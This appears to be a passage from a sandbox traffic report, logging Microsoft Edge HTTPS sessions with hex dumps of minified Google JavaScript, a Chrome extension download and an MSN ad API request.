                                                                                        2024-07-24 05:14:42 UTC1390INData Raw: 72 6e 7b 76 61 6c 75 65 4f 66 3a 61 7d 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 64 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 74 6f 53 74 72 69 6e 67 28 29 2e 69 6e 64 65 78 4f 66 28 22 60 22 29 3d 3d 3d 2d 31 7d 3b 0a 5f 2e 66 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 65 62 29 72 65 74 75 72 6e 20 61 2e 61 61 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 47 22 29 3b 7d 3b 67 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 70 61 61 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 61 2b 22 3a 22 7d 29 7d 3b 5f 2e 72 61 61 3d 66 75 6e
                                                                                        Data Ascii: rn{valueOf:a}.valueOf()};db=function(a){return a.toString().indexOf("`")===-1};_.fb=function(a){if(a instanceof _.eb)return a.aa;throw Error("G");};gb=function(a){return new paa(function(b){return b.substr(0,a.length+1).toLowerCase()===a+":"})};_.raa=fun
                                                                                        2024-07-24 05:14:42 UTC1390INData Raw: 77 69 6e 64 6f 77 29 3b 62 26 26 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 6f 6e 63 65 22 2c 62 29 7d 3b 5f 2e 42 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 73 72 63 3d 5f 2e 41 62 28 62 29 3b 5f 2e 7a 62 28 61 29 7d 3b 5f 2e 43 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 5f 2e 6d 62 28 62 29 3b 62 21 3d 3d 76 6f 69 64 20 30 26 26 28 61 2e 68 72 65 66 3d 62 29 7d 3b 5f 2e 44 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 5f 2e 6d 62 28 62 29 3b 62 21 3d 3d 76 6f 69 64 20 30 26 26 61 2e 72 65 70 6c 61 63 65 28 62 29 7d 3b 0a 5f 2e 45 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 5f 2e 66 61 2e 6e 61 76 69 67 61 74 6f 72 3b 72 65 74 75 72 6e 20 61 26 26 28 61 3d 61 2e 75 73 65 72 41 67 65 6e 74 29 3f 61 3a 22
                                                                                        Data Ascii: window);b&&a.setAttribute("nonce",b)};_.Bb=function(a,b){a.src=_.Ab(b);_.zb(a)};_.Cb=function(a,b){b=_.mb(b);b!==void 0&&(a.href=b)};_.Db=function(a,b){b=_.mb(b);b!==void 0&&a.replace(b)};_.Eb=function(){var a=_.fa.navigator;return a&&(a=a.userAgent)?a:"
                                                                                        2024-07-24 05:14:42 UTC1390INData Raw: 62 26 26 62 5b 31 5d 29 73 77 69 74 63 68 28 62 5b 31 5d 29 7b 63 61 73 65 20 22 34 2e 30 22 3a 61 3d 22 38 2e 30 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 35 2e 30 22 3a 61 3d 22 39 2e 30 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 36 2e 30 22 3a 61 3d 22 31 30 2e 30 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 37 2e 30 22 3a 61 3d 22 31 31 2e 30 22 7d 65 6c 73 65 20 61 3d 22 37 2e 30 22 3b 65 6c 73 65 20 61 3d 63 5b 31 5d 3b 62 3d 61 7d 65 6c 73 65 20 62 3d 22 22 3b 72 65 74 75 72 6e 20 62 7d 76 61 72 20 64 3d 52 65 67 45 78 70 28 22 28 5b 41 2d 5a 5d 5b 5c 5c 77 20 5d 2b 29 2f 28 5b 5e 5c 5c 73 5d 2b 29 5c 5c 73 2a 28 3f 3a 5c 5c 28 28 2e 2a 3f 29 5c 5c 29 29 3f 22 2c 22 67 22 29 3b 63 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 65 3b 65 3d 64 2e 65 78 65 63 28 62
                                                                                        Data Ascii: b&&b[1])switch(b[1]){case "4.0":a="8.0";break;case "5.0":a="9.0";break;case "6.0":a="10.0";break;case "7.0":a="11.0"}else a="7.0";else a=c[1];b=a}else b="";return b}var d=RegExp("([A-Z][\\w ]+)/([^\\s]+)\\s*(?:\\((.*?)\\))?","g");c=[];for(var e;e=d.exec(b
                                                                                        2024-07-24 05:14:42 UTC1390INData Raw: 3d 3d 3d 22 43 68 72 6f 6d 65 20 4f 53 22 3a 5f 2e 4c 62 28 22 43 72 4f 53 22 29 7d 3b 58 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 4e 22 29 3b 7d 3b 47 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 62 29 3b 72 65 74 75 72 6e 20 61 3d 3d 6e 75 6c 6c 3f 62 3a 61 2b 62 7d 3b 0a 49 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 48 61 61 29 72 65 74 75 72 6e 20 5f 2e 59 62 28 61 29 3b 66 6f 72 28 76 61 72 20 62 3d 22 22 2c 63 3d 30 2c 64 3d 61 2e 6c 65 6e 67 74 68 2d 31 30 32 34 30 3b 63 3c 64 3b 29 62 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 2e 73 75
                                                                                        Data Ascii: ==="Chrome OS":_.Lb("CrOS")};Xb=function(){throw Error("N");};Gaa=function(a,b){b=String.fromCharCode.apply(null,b);return a==null?b:a+b};Iaa=function(a){if(!Haa)return _.Yb(a);for(var b="",c=0,d=a.length-10240;c<d;)b+=String.fromCharCode.apply(null,a.su
                                                                                        2024-07-24 05:14:42 UTC1390INData Raw: 66 20 61 3d 3d 3d 22 73 74 72 69 6e 67 22 29 61 3d 61 3f 6e 65 77 20 5f 2e 6b 63 28 61 2c 5f 2e 6c 63 29 3a 5f 2e 6a 63 28 29 3b 65 6c 73 65 20 69 66 28 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 21 3d 3d 5f 2e 6b 63 29 69 66 28 5f 2e 24 62 28 61 29 29 61 3d 61 2e 6c 65 6e 67 74 68 3f 6e 65 77 20 5f 2e 6b 63 28 64 3f 61 3a 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 61 29 2c 5f 2e 6c 63 29 3a 5f 2e 6a 63 28 29 3b 65 6c 73 65 7b 69 66 28 21 62 29 74 68 72 6f 77 20 45 72 72 6f 72 28 29 3b 61 3d 76 6f 69 64 20 30 7d 72 65 74 75 72 6e 20 61 7d 3b 0a 5f 2e 57 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 21 21 61 26 26 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 3f 61 2e 69 6e 63 6c 75 64 65 73 28 62 29 3a 61 2e 68 61 73 28 62 29 29
                                                                                        Data Ascii: f a==="string")a=a?new _.kc(a,_.lc):_.jc();else if(a.constructor!==_.kc)if(_.$b(a))a=a.length?new _.kc(d?a:new Uint8Array(a),_.lc):_.jc();else{if(!b)throw Error();a=void 0}return a};_.Waa=function(a,b){return!!a&&(Array.isArray(a)?a.includes(b):a.has(b))
                                                                                        2024-07-24 05:14:42 UTC1390INData Raw: 3d 6c 3b 76 3d 67 3b 7a 3d 72 3b 78 3d 70 3b 66 6f 72 28 76 61 72 20 48 20 69 6e 20 64 29 64 3d 2b 48 2c 69 73 4e 61 4e 28 64 29 7c 7c 0a 64 3e 3d 31 30 32 34 7c 7c 28 74 2d 2d 2c 78 2b 2b 2c 7a 2d 3d 48 2e 6c 65 6e 67 74 68 2c 67 3d 65 28 64 2c 78 29 2b 66 28 74 2c 76 2c 7a 29 2c 67 3c 71 26 26 28 61 3d 31 2b 64 2c 71 3d 67 29 29 7d 72 65 74 75 72 6e 20 61 7d 3b 6a 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 63 2b 61 2a 33 2b 28 61 3e 31 3f 61 2d 31 3a 30 29 7d 3b 69 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 28 61 3e 31 3f 61 2d 31 3a 30 29 2b 28 61 2d 62 29 2a 34 7d 3b 67 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 30 3f 30 3a 39 2a 4d 61 74 68 2e 6d 61 78
                                                                                        Data Ascii: =l;v=g;z=r;x=p;for(var H in d)d=+H,isNaN(d)||d>=1024||(t--,x++,z-=H.length,g=e(d,x)+f(t,v,z),g<q&&(a=1+d,q=g))}return a};jba=function(a,b,c){return c+a*3+(a>1?a-1:0)};iba=function(a,b){return(a>1?a-1:0)+(a-b)*4};gba=function(a,b){return a==0?0:9*Math.max


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        11192.168.2.649765142.250.65.1934432832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:14:42 UTC594OUTGET /crx/blobs/AVsOOGgL4EVsLTMzZa-C0yXaDVW5z6pCjWzx7YKwHb9PR6v117H2hbsZgQ2S3VrQetSMoK86b9iY-_-8nYIxIJD4BasJl9SD8IoqvPIbEK9wBlfqTusC6rL6yTYDfaVSn9sAxlKa5bRpPaxsFjcmEK7Nec5bVL7NZYhc/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_80_1_0.crx HTTP/1.1
                                                                                        Host: clients2.googleusercontent.com
                                                                                        Connection: keep-alive
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                        2024-07-24 05:14:42 UTC566INHTTP/1.1 200 OK
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 135751
                                                                                        X-GUploader-UploadID: ACJd0Nqt8ciPsB5aXv-y6yFzVA5suyQL16zRXx2XH3HNCtwToePrMTiB1QTLz_2j4rPPO-APsSY
                                                                                        X-Goog-Hash: crc32c=IDdmTg==
                                                                                        Server: UploadServer
                                                                                        Date: Tue, 23 Jul 2024 15:56:45 GMT
                                                                                        Expires: Wed, 23 Jul 2025 15:56:45 GMT
                                                                                        Cache-Control: public, max-age=31536000
                                                                                        Last-Modified: Tue, 23 Jul 2024 15:56:28 GMT
                                                                                        ETag: 1d368626_ddaec042_86665b6c_28d780a0_b2065016
                                                                                        Content-Type: application/x-chrome-extension
                                                                                        Age: 47877
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close
                                                                                        2024-07-24 05:14:42 UTC824INData Raw: 43 72 32 34 03 00 00 00 e8 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                        Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                        2024-07-24 05:14:42 UTC1390INData Raw: cb 30 5e ae fd 8f bf fc 18 3f ab aa ce 6f f5 9f 86 ea f3 4f e7 8b aa 7e fc f9 c7 ed f2 de 57 f2 ef e5 b5 1f ab 7e fc f1 97 7f fc 18 f2 a7 ba e6 52 7f be 7a 86 4d 61 da 86 e0 b6 91 9a 75 5d 9a b5 2a 9f 87 2d b7 6e 97 ac 9b be 32 73 3c 97 a6 da 8a e4 b0 45 fb 9f 36 ba 3c 2e c2 57 bd 48 91 71 68 ae 17 fd f9 3a 6a a8 79 f8 fe f7 4e dd 44 1a 5d 4e 6a fc f5 d0 bb b5 f4 df 2f a7 cb 61 8a 9a f7 7b e9 db fd f7 67 ca ce f9 92 d0 b9 66 29 ba 7e 7f 5f 98 88 8b a7 31 71 fe fe 4c da 11 23 06 47 da 8d 8d f0 51 97 77 14 c8 99 1d 4a 10 22 04 c4 8e 74 e1 33 0f c2 4d e5 0b 5b 3c 43 e7 18 dc 2e a5 0f 8d 7c 77 d8 1e 94 73 2b 4c 54 17 3e 9b 8f 26 ec 8e 26 50 a5 85 6a 61 ea eb 6e 98 0b 73 73 39 ee c2 67 61 3a ff 1e e7 f7 b3 85 53 ee a9 9e 59 f5 3e 81 0c 1d b9 f8 4a 3a 06 39 87
                                                                                        Data Ascii: 0^?oO~W~RzMau]*-n2s<E6<.WHqh:jyND]Nj/a{gf)~_1qL#GQwJ"t3M[<C.|ws+LT>&&Pjanss9ga:SY>J:9
                                                                                        2024-07-24 05:14:42 UTC1390INData Raw: fb 44 b0 b4 75 cd a2 45 f6 da fb af bc 3f ce 66 36 89 54 f7 7b 85 4d 64 18 16 65 30 97 1e f2 8b 3d 8c f3 00 e1 48 79 96 ec ea 1d f6 a0 d6 80 10 97 4f 10 60 43 7e 2d de bf 3f ac f5 dc 1b 32 87 63 d4 2b 25 8c c9 3d 52 f4 88 e8 d8 51 25 77 c5 5e 7a c9 5e 86 25 15 31 06 d8 2d 7b ad d1 54 eb 11 a3 53 14 2c cf 7d f9 ff d0 e0 b2 c1 43 66 d4 4a 06 e2 33 37 55 9a 78 d1 48 02 d7 8b 1b d1 0b 33 cc 70 a7 4b c1 72 2f c2 13 19 ed c4 5b a9 a0 8b 4d b9 59 5e 7b 72 2d ff 51 fb dc 0d f6 85 87 e6 ba 95 5e 68 12 00 3b 14 08 91 1b c3 91 cc 5a 03 7c cc a3 e0 a7 19 9b 8f 07 0b 70 9c 51 bc af ba f7 c7 22 7f 6b ed da 1b 3c a4 60 9b 5a c3 ab 54 de 7c 82 75 4b 00 a2 d8 aa 43 9d 31 12 d1 82 59 67 1d aa fb 81 1f 1b e0 15 11 e5 97 16 34 8b 65 ef 77 cd 57 b2 c7 ad ba 65 8d f2 aa de 35
                                                                                        Data Ascii: DuE?f6T{Mde0=HyO`C~-?2c+%=RQ%w^z^%1-{TS,}CfJ37UxH3pKr/[MY^{r-Q^h;Z|pQ"k<`ZT|uKC1Yg4ewWe5
                                                                                        2024-07-24 05:14:42 UTC1390INData Raw: a3 3a 66 63 2b dc 55 dd f4 76 4a 8c 67 19 c8 cf dc c0 a9 f6 5c fb 04 0e 30 9f 45 2b 3a 9d 3b 96 d8 5b 6e bd d6 e7 9c e8 c6 a6 3c ec 04 3f 00 02 d8 07 6a 07 4f 70 bb e6 0d 44 84 8e 31 f6 ed 3b e9 6a c5 3d 68 26 0c d9 55 07 3f b0 ae cd 25 f6 a5 bf 92 bd 1a 68 de 40 51 36 ee a5 e4 ce 91 50 6c c6 16 de 88 4e bc 66 c4 fd 22 da f5 e3 d6 a9 11 77 9e cc c8 00 69 5f 40 62 95 20 df ff 5c 62 ff d0 7c 77 74 a5 ee 94 81 37 09 f8 6e 89 76 d0 cc c3 9e ed f1 98 74 e8 44 3c ad 43 b4 7d 7c ef 37 12 7f b8 65 96 f8 5e 7f 6d d6 87 cf c8 3f 3c ff 0f fe 46 0a 5c ba b6 fe 19 70 0e 32 75 0d ee 8d af b1 e1 04 85 42 3c 9e 59 9b c0 78 a6 b0 b5 39 1f b7 d1 de cd 12 22 41 49 d1 15 ab a1 11 33 5c d4 fd b2 5b d9 73 15 d6 f9 35 bc c7 cd bb 1d 79 b6 97 eb f1 e5 7e 9d 14 50 5d 28 7c 07 9c
                                                                                        Data Ascii: :fc+UvJg\0E+:;[n<?jOpD1;j=h&U?%h@Q6PlNf"wi_@b \b|wt7nvtD<C}|7e^m?<F\p2uB<Yx9"AI3\[s5y~P](|
                                                                                        2024-07-24 05:14:42 UTC1390INData Raw: f4 82 39 aa e0 7a ec d0 f9 66 30 94 41 fc df ee db 1c a9 13 e6 2d 30 13 82 a1 ce 12 31 7d 82 53 e2 83 47 45 59 27 58 b8 8f 29 06 91 69 cf 5a f8 cc 88 c6 0f 64 a8 24 03 ce ef 34 a6 34 d9 53 76 aa d1 f7 b6 0a 2b fc d4 75 76 ce 3a 75 4f 2d 57 df f3 bf de ff fb dd 66 83 81 23 92 f4 b0 c9 4d 75 c1 14 7c 9e f8 b8 ab 3c 75 20 0d 34 51 a3 0e b9 57 8f 5c c9 54 10 9d 35 cc 9b 85 ba 8d ce d3 40 ea df eb f4 bd c6 2c 8d bf 7f cb f8 66 fe ef 5a ba 1d ba 7f 9e b7 3c ff e1 39 cb 7f 7d 77 90 3e 1b 53 53 b5 ff 3a 2b 59 eb 1a b5 ef 9a f3 97 e0 e3 a3 e0 8e ca 4c fb 5e 74 ea 56 74 b6 f6 9f d3 57 e1 d7 9f b9 df 5e fe f7 bb 96 ae e7 1e 0d df 6b e7 fb 2c e6 b1 79 7f 1c 1b ef fb ff 1f ba be 0c 5d 77 5f 05 74 4c cd 62 ce b9 d6 b7 e6 3a 9d e3 7f 1f 1a cd c7 fb 67 75 fb f1 97 bf fe
                                                                                        Data Ascii: 9zf0A-01}SGEY'X)iZd$44Sv+uv:uO-Wf#Mu|<u 4QW\T5@,fZ<9}w>SS:+YL^tVtW^k,y]w_tLb:gu
                                                                                        2024-07-24 05:14:42 UTC1390INData Raw: ad 33 4d c7 0c 67 6e 81 d6 1e 0c 0b 79 e1 e5 4a 9e 81 e8 0e 6d e9 ca e1 60 fa 07 7f fa d2 b1 1f f7 7b ac 3f 4a 13 55 ac f1 4c 7f 94 cf f0 fa f1 b6 7e 2d 9f 5f f6 86 cc fe f1 ec 09 fd 70 24 26 57 1c cf 8f 61 96 f1 4e 24 37 5b 2c f1 37 09 ff 3e 8d 4e e3 76 3b 30 89 99 dc ba 80 99 fa f5 86 7a ab 17 00 10 99 70 d6 78 75 3f ec 5d 26 c0 29 73 23 b1 4d 01 b1 bd 85 22 65 c6 ae 4d 05 29 bb 19 a4 97 d3 26 50 39 76 5a 02 7b 3b 5c cd 19 16 9a 34 6a ca 98 31 83 a3 30 c0 8d 8b 90 69 14 2e 18 a7 11 fc 43 a4 1b 50 25 a6 9a b3 38 b3 01 a7 ed 89 86 13 1f da e6 66 69 88 9b 9b cb a3 0e 88 10 49 34 ac c5 ac 87 cc 0e df 3a 83 59 3f 4a c7 9a 9c 4a 52 22 4a 73 50 10 93 5b 04 26 5d e4 1b 03 5e 57 1d b5 9f 07 15 ea 11 56 a2 32 1c 57 08 4b 8e 3a dd 14 09 a5 9a 54 87 09 2c df 70 99
                                                                                        Data Ascii: 3MgnyJm`{?JUL~-_p$&WaN$7[,7>Nv;0zpxu?]&)s#M"eM)&P9vZ{;\4j10i.CP%8fiI4:Y?JJR"JsP[&]^WV2WK:T,p
                                                                                        2024-07-24 05:14:42 UTC1390INData Raw: 34 3d 97 d3 d8 25 32 96 b3 f5 13 f7 6e 04 c3 e8 d7 24 af 68 00 67 eb c3 66 e7 0c 80 f3 86 ed 66 61 be 93 2c c1 a2 81 5f 40 75 19 01 ec 81 b2 11 59 6b 02 01 7c 80 cd 06 9c b7 f6 39 2e 1b a2 d1 59 0b 31 ae 2b a8 f9 19 97 78 ba 9e 92 04 eb 38 0f b1 da 61 42 cf b8 b8 ab 80 50 16 da 7c e0 2a 5d 2e b6 61 3d 16 a7 f7 ad 25 37 09 0c 17 4a fa a3 b0 2f 74 b2 60 63 c4 b5 32 fd ca 4b dc 91 50 cd 08 cf a1 3e ef 10 50 75 05 0f a4 06 bb 61 21 1b 94 db 98 9a 6d 25 ee 69 db 2b 4b 9f 80 46 c6 7a 5d 13 fe 95 45 1a 44 be bd d3 f7 20 9f 7f 88 83 9f 5b 5b 41 3d 0c 7f 6e 6e 02 8a 0a a9 66 0f 64 38 ff 27 1a e0 86 95 3d 0e 65 8e 2a 9e ff b3 5a f5 13 b7 6b 4c e2 da dd 53 96 36 98 be 35 e0 8b a2 03 ec 6d 83 0f 98 a6 6a 9a 7d d4 30 cf b9 22 24 be 95 ed ae b5 82 4d 0c 6d 44 68 ea 50
                                                                                        Data Ascii: 4=%2n$hgffa,_@uYk|9.Y1+x8aBP|*].a=%7J/t`c2KP>Pua!m%i+KFz]ED [[A=nnfd8'=e*ZkLS65mj}0"$MmDhP
                                                                                        2024-07-24 05:14:42 UTC1390INData Raw: 87 c6 bc 81 e5 c6 01 f8 80 6e be 68 ae 8d 1a 92 d9 22 7c fb 47 cd 55 a8 b9 72 2b d4 f6 c4 b2 bb dd a3 21 3e c1 52 53 40 cc 0f 98 69 56 28 ab c0 b8 20 06 f5 02 9a 6f 68 bf 82 e6 8f 24 99 81 79 93 8e d4 f5 47 b4 3f 91 f0 93 e1 db ea 74 d9 df bc 02 e8 81 b4 53 49 59 03 c4 1b 90 6e de 93 27 17 a4 fa 97 68 50 4b ef a1 19 2a b3 8e 70 02 6b db 66 44 24 b0 33 79 cf de 43 b1 cd cd c3 41 86 8d 22 07 8e 36 37 b7 cc 9f 0b de bb 60 25 1c fe f7 ea 9b 07 c5 80 f6 9d 10 df 4c b8 27 ef 1c 14 d6 c4 c3 c8 1c ee dd 3d 4d da 8a 0c c4 52 71 54 0a cc 3d d5 5f 29 07 02 fd 8d 5b 75 1c 35 30 b0 47 f8 b3 f1 28 6e 46 7c 56 31 fc 89 c5 6c ca aa 76 67 10 f7 66 c9 bd 26 86 fd fd 33 5d db d6 b3 31 ae 67 3e af 13 4c ea cf 63 28 1c 73 d5 b7 cf 2e dd b8 9a fa 75 a8 12 83 1e ae 82 2c 32 d0
                                                                                        Data Ascii: nh"|GUr+!>RS@iV( oh$yG?tSIYn'hPK*pkfD$3yCA"67`%L'=MRqT=_)[u50G(nF|V1lvgf&3]1g>Lc(s.u,2
                                                                                        2024-07-24 05:14:42 UTC1390INData Raw: 1a 0c 27 c9 15 33 8e 4d 6d 30 cb db c6 1d 95 4b 44 47 2a fe 65 6d 62 82 56 4a e1 cb 97 55 fc 6d 2d fc d8 a1 69 e9 bd ea 7b 41 b9 d4 6c 30 29 3a d9 54 cc 2c 05 5e a2 02 b3 c5 bb 08 19 d8 62 b9 d7 a5 62 06 3c 34 40 2e 25 3c 2e c3 97 e2 9d d1 3b c2 71 73 13 d5 e3 35 1f 0d 77 bd 52 9b 9d 01 9b 76 ce d3 0a 52 52 c7 6b 5d b2 e6 95 0a ae bf 14 a3 21 ab aa 31 20 bd b4 d7 42 bf e6 ac e0 5e 40 6f ac 03 3a 6a 01 54 03 d6 36 21 06 2c ba 37 91 a3 0c 4f d2 f8 12 13 46 bb 84 e9 6e dd 4f 81 45 78 78 68 42 e3 13 1f ac 1d 5f 60 04 f8 9a c2 4f 39 8e dc 8c 8d 17 91 02 eb a3 e5 59 ed 20 d2 12 4f e2 a7 7e 66 86 b7 89 8d 5e 42 dd ad 6d cf 2f c2 ed a0 58 e6 a4 e8 94 cb 4f a1 44 3b d4 2c b4 50 44 ce 14 d0 d2 b6 82 1a 45 be 6a b8 a8 f3 70 b4 81 60 59 46 50 39 3d 99 b2 b8 fb 19 23
                                                                                        Data Ascii: '3Mm0KDG*embVJUm-i{Al0):T,^bb<4@.%<.;qs5wRvRRk]!1 B^@o:jT6!,7OFnOExxhB_`O9Y O~f^Bm/XOD;,PDEjp`YFP9=#
                                                                                        2024-07-24 05:14:42 UTC1390INData Raw: 5e 4e 7f fd fa f3 8f 27 8f ff d8 06 aa 7b 8f 52 b0 a4 78 a6 f8 ce 72 c4 5f 39 36 74 23 3d a2 5e 64 ed 29 3c 87 d5 63 57 ef 41 05 40 38 0f e8 2f d0 e8 ee 60 78 31 a8 e0 aa 56 f0 9d a3 17 ab 1f c9 83 ee a5 c0 0c d4 43 84 42 20 54 19 07 77 89 e3 f9 04 05 67 92 9e a7 b0 83 ae 1c df b9 60 e3 01 68 2e f0 49 a9 c5 b0 3d 74 1f 03 d9 07 37 09 19 27 70 29 60 8f d4 1e 13 eb a4 2d 83 17 0b 58 58 65 0b 2b 09 80 2e 29 5a 5a 1e 7b 0b 46 a0 a2 7f e9 a8 77 64 98 5b 0e e4 3a 8a 11 91 76 32 04 ed 6a 28 4f 01 04 c6 70 85 84 f6 e7 b3 20 6e 41 39 10 d0 00 a9 42 a0 f8 c0 6e f0 6c 6d 44 a1 12 09 6c f4 67 bf 3f ab ff f1 f8 f1 1c 10 16 b7 35 9a 93 9f 70 5f e2 ca bd 60 c7 46 0f d8 18 13 66 58 1b 01 f9 88 5d 2a e3 a5 e8 eb b3 27 1a 94 30 a2 67 4f 44 be 18 97 0f cf c7 58 11 76 5a 6f
                                                                                        Data Ascii: ^N'{Rxr_96t#=^d)<cWA@8/`x1VCB Twg`h.I=t7'p)`-XXe+.)ZZ{Fwd[:v2j(Op nA9BnlmDlg?5p_`FfX]*'0gODXvZo


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        12192.168.2.64977723.101.168.444432832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:14:44 UTC616OUTGET /v4/api/selection?placement=88000360&nct=1&fmt=json&ADEFAB=1&OPSYS=WIN10&locale=en-GB&country=CH&edgeid=5518710994624701133&ACHANNEL=4&ABUILD=117.0.5938.150&poptin=0&devosver=10.0.19045.2006&clr=esdk&UITHEME=light&EPCON=0&AMAJOR=117&AMINOR=0&ABLD=5938&APATCH=150 HTTP/1.1
                                                                                        Host: arc.msn.com
                                                                                        Connection: keep-alive
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                        2024-07-24 05:14:44 UTC633INHTTP/1.1 200 OK
                                                                                        Cache-Control: max-age=86400, private
                                                                                        Content-Length: 2060
                                                                                        Content-Type: application/json; charset=utf-8
                                                                                        Expires: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                        Server: Microsoft-IIS/10.0
                                                                                        ARC-RSP-DBG: [{"X-RADID":"P425775005-T700421790-C128000000003081769"},{"BATCH_REDIRECT_STORE":"B128000000003081769+P0+S0"},{"OPTOUTSTATE":"256"},{"REGIONALPOLICY":"0"}]
                                                                                        Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version
                                                                                        X-AspNet-Version: 4.0.30319
                                                                                        X-Powered-By: ASP.NET
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                        Date: Wed, 24 Jul 2024 05:14:43 GMT
                                                                                        Connection: close
